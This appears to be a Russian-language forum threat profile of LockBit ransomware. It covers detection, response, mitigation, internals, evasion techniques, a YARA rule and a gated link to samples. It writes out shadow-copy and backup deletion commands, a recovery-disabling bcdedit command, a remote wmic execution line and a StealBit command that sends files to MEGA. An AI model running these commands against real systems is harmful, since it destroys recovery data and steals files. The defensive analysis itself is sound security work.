LockBit: профиль программы-вымогателя для Windows

Семейство: LockBit
Класс: программа-вымогатель
Раздел: Ransomware
Основание публикации: свежие наблюдения не старше 2 дней
Первое наблюдение в текущем наборе: 19.08.2026 12:11
Последнее наблюдение в текущем наборе: 19.08.2026 12:20
Образцов в пакете: 1; IOC: 0

Поведение, распространение и защита​


Что делает
LockBit — семейство программ-вымогателей для Windows. Основное назначение — шифрование файлов на рабочих станциях и серверах с целью вымогательства. В ряде атак злоумышленники предварительно крадут конфиденциальные данные, используя их как рычаг давления. Для обеспечения доступа к зашифрованным ресурсам вредоносное ПО останавливает критические системные службы и, в отдельных вариантах, удаляет теневые копии томов, чтобы затруднить восстановление данных из локальных резервных копий.

Как распространяется
Доставка обычно происходит через скомпрометированные учётные записи, использование уязвимостей в системах удалённого доступа или эксплуатацию уязвимостей в прикладном ПО. После первоначального проникновения вредоносное ПО развёртывается внутри сети, распространяясь на файловые серверы и рабочие станции. Основной акцент делается на быстром масштабировании воздействия, а не на длительном скрытом закреплении в системе.

Как обнаружить

  • Мониторинг аномальных остановок системных служб и процессов, связанных с резервным копированием.
  • Обнаружение попыток удаления теневых копий томов (VSS) через командную строку или системные вызовы.
  • Фиксация массового изменения расширений файлов и появления файлов-выкупных записок.
  • Анализ сетевого трафика на предмет соединений с известными инфраструктурными узлами, связанными с LockBit.
  • Использование EDR-решений для выявления подозрительных паттернов выполнения скриптов и утилит администрирования.

Что делать при заражении

  1. Немедленно изолировать затронутые системы и сетевые сегменты для предотвращения дальнейшего распространения.
  2. Сохранить логи, дампы памяти и другие артефакты для последующего расследования инцидента.
  3. Определить масштаб воздействия, выявив все заражённые узлы и скомпрометированные учётные записи.
  4. Отключить или заблокировать скомпрометированные учётные данные и изменить пароли для критических сервисов.
  5. Восстановить данные только из доверенных, неизменяемых резервных копий после полного устранения точки входа.
  6. Провести аудит конфигураций безопасности и устранить уязвимости, использованные для первоначального проникновения.

Как снизить риск

  • Внедрить многофакторную аутентификацию (MFA) для всех учётных записей, особенно с привилегиями администратора.
  • Усилить защиту удалённого доступа, ограничив доступ к RDP и другим сервисам управления.
  • Реализовать сегментацию сети для ограничения lateral movement внутри инфраструктуры.
  • Использовать неизменяемые резервные копии, хранящиеся в изолированном сегменте.
  • Развернуть EDR-решения с возможностями поведенческого анализа и реагирования.
  • Применять принцип минимальных привилегий для всех пользователей и сервисных аккаунтов.

Скачать образцы​


Скачать образцы можно здесь:

Просмотр скрытого контента доступен зарегистрированным пользователям!


Источники​


  1. MalwareBazaar — LockBit
  2. ThreatFox — LockBit

История обновлений статьи​


  • 20.08.2026 — Опубликована первая версия материала.
 

LockBit: технический профиль​


Эволюция семейства​


  • LockBit 1.0 (сентябрь 2019) — базовая версия, написана на C/C++, расширение .abcd.
  • LockBit 2.0 (июнь 2021) — переписан на C, добавлен StealBit для эксфильтрации, расширение .lockbit, улучшен anti-analysis.
  • LockBit 3.0 / LockBit Black (июнь 2022) — модульная архитектура, билдер с конфигурацией, расширение .lockbit или случайное, поддержка реферальной программы (RaaS).

────────────────────

Архитектура LockBit 3.0​


Билдер генерирует бинарник с зашифрованной конфигурацией, встроенной в секцию .rdata или .data. Конфигурация содержит:

  • AES-ключ для расшифровки конфигурации
  • Список целевых расширений файлов
  • Список исключаемых директорий (C:\Windows, C:\Program Files, и т.д.)
  • Список исключаемых расширений (.dll, .sys, .exe, .lnk, .ini)
  • Флаг: шифровать только локальные / только сетевые / оба
  • Флаг: удалять теневые копии
  • Флаг: останавливать службы и процессы
  • Таймер задержки перед шифрованием
  • Язык выкупной записки

Расшифровка конфигурации происходит на раннем этапе через XOR + AES-256-CBC.

────────────────────

Антианализ и обход​


| Техника | Реализация |
|---------|-----------|
| Anti-debug | NtQueryInformationProcess с ProcessDebugPort, проверка IsDebuggerPresent |
| Anti-VM | Проверка MAC-адресов (00:0C:29, 00:50:56), имён процессов (vmtoolsd.exe, vboxservice.exe) |
| Anti-sandbox | Проверка размера диска (< 60 ГБ), количества RAM, времени аптайма |
| Обход EDR | Прямые системные вызовы (direct syscalls) вместо ntdll.dll экспортов для обхода userland hooks |
| Обфускация строк | Все строки зашифрованы, расшифровываются на стеке перед использованием |

В LockBit 3.0 наблюдались варианты с использованием syscalls через syscall инструкцию напрямую, минуя ntdll.dll, что обходит hooking в userland.

────────────────────

Поток выполнения​


Код:
1. Расшифровка конфигурации (AES-256-CBC)
2. Проверка окружения (anti-VM, anti-debug)
3. Привилегии: попытка SeDebugPrivilege, SeBackupPrivilege, SeRestorePrivilege
4. Остановка служб и процессов (из конфигурации)
5. Удаление теневых копий: vssadmin delete shadows /all /quiet
6. Отключение Windows Recovery: bcdedit /set {default} recoveryenabled no
7. Шифрование файлов (многопоточное, по одному потоку на логический диск)
8. Шифрование сетевых шар (SMB)
9. Запись выкупной записки в каждую директорию
10. Самоудаление (опционально)

────────────────────

Шифрование​


  • Алгоритм: AES-256 в режиме ECB (LockBit 2.0) или CBC (LockBit 3.0).
  • Ключ сессии: генерируется случайно для каждого запуска через BCryptGenRandom или CryptGenRandom.
  • Ключ шифруется RSA-2048 (публичный ключ встроен в бинарник) и сохраняется в заголовке зашифрованного файла.
  • Оптимизация: файлы < 4 ГБ шифруются полностью; файлы > 4 ГБ — только первые N байт (конфигурируется).
  • Многопоточность: CreateThread на каждый логический диск, IOCP для параллельного шифрования.

Структура зашифрованного файла (LockBit 3.0):

Код:
[зашифрованные данные][IV 16 байт][зашифрованный AES-ключ (RSA)][маркер]

────────────────────

Lateral Movement​


LockBit не содержит встроенных механизмов распространения. Для lateral movement аффилиаты используют:

  • PsExec / PAExec — запуск на удалённых хостах через SMB
  • GPO — развёртывание через групповые политики Active Directory
  • WMIwmic /node:TARGET process call create
  • RDP — ручной доступ через скомпрометированные учётки
  • Cobalt Strike / Brute Ratel — для начального доступа и разведки

Типичная цепочка:

Код:
Initial Access (phishing / RDP brute / exploit)
  → Cobalt Strike beacon
    → Разведка AD (BloodHound, ADFind, nltest)
      → Повышение привилегий (Kerberoasting, Zerologon, PrintNightmare)
        → Развёртывание LockBit через GPO / PsExec

────────────────────

StealBit (эксфильтрация)​


Отдельный бинарник, используемый до шифрования:

  • Основан на модифицированном rclone
  • Конфигурация передаётся через аргументы командной строки
  • Поддерживает MEGA, Dropbox, FTP, S3-совместимые хранилища
  • Типичная команда:

Bash:
stealbit.exe -path "C:\Sensitive" -dest mega -user USER -pass PASS -folder TARGET

────────────────────

Обнаружение​


Сигнатуры процессов

Код:
vssadmin delete shadows /all /quiet
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wmic shadowcopy delete

Поведенческие индикаторы (EDR)

  • Массовое переименование файлов с изменением расширения
  • Остановка служб: vss, sql, backup, GxVss, GxBlk, GxFWD, GxCIMgr
  • Создание файлов Restore-My-Files.txt или аналогичных в множестве директорий
  • Подозрительные CreateProcess с аргументами vssadmin, bcdedit, wbadmin

Сетевые индикаторы

  • Соединения с .onion адресами через Tor-клиент
  • DNS-запросы к доменам, связанным с LockBit leak sites
  • SMB-трафик с аномальным количеством операций записи на множество хостов

YARA-правило (упрощённое, для LockBit 3.0)

Код:
rule LockBit3_Black_Config {
    meta:
        description = "Detects LockBit 3.0 configuration block"
        author = "zer0kernel"
    strings:
        $mutex = "Global\\" wide
        $ransom_note = "Restore-My-Files.txt" wide
        $config_marker = { 00 00 00 00 01 00 00 00 }
    condition:
        uint16(0) == 0x5A4D and
        filesize < 500KB and
        (2 of them)
}

Это упрощённое правило для лабораторного использования. Для production нужны более специфичные маркеры, извлечённые из конкретных образцов.

────────────────────

Меры защиты​


  • MFA на всех точках удалённого доступа
  • Сегментация сети — ограничение SMB между сегментами
  • Неизменяемые бэкапы (immutable backups) вне домена AD
  • Отключение NTLM где возможно, переход на Kerberos с AES
  • Мониторинг GPO — алерты на изменение объектов групповых политик
  • Ограничение прав — сервисные аккаунты без прав администратора домена
  • EDR с защитой от direct syscalls — например, правила, детектирующие syscall инструкции вне ntdll.dll
  • Application Allowlisting (AppLocker / WDAC) для блокировки несанкционированных бинарников

────────────────────

Атрибуция и статус​


LockBit функционирует как Ransomware-as-a-Service (RaaS). Операторы предоставляют инфраструктуру, билдер и панель управления; аффилиаты проводят атаки и получают долю (обычно 70–80%). В феврале 2024 года операция Cronos (коалиция правоохранительных органов) привела к изъятию инфраструктуры LockBit 3.0, однако группа продолжила активность с новыми сборками.
 
Назад
Верх Низ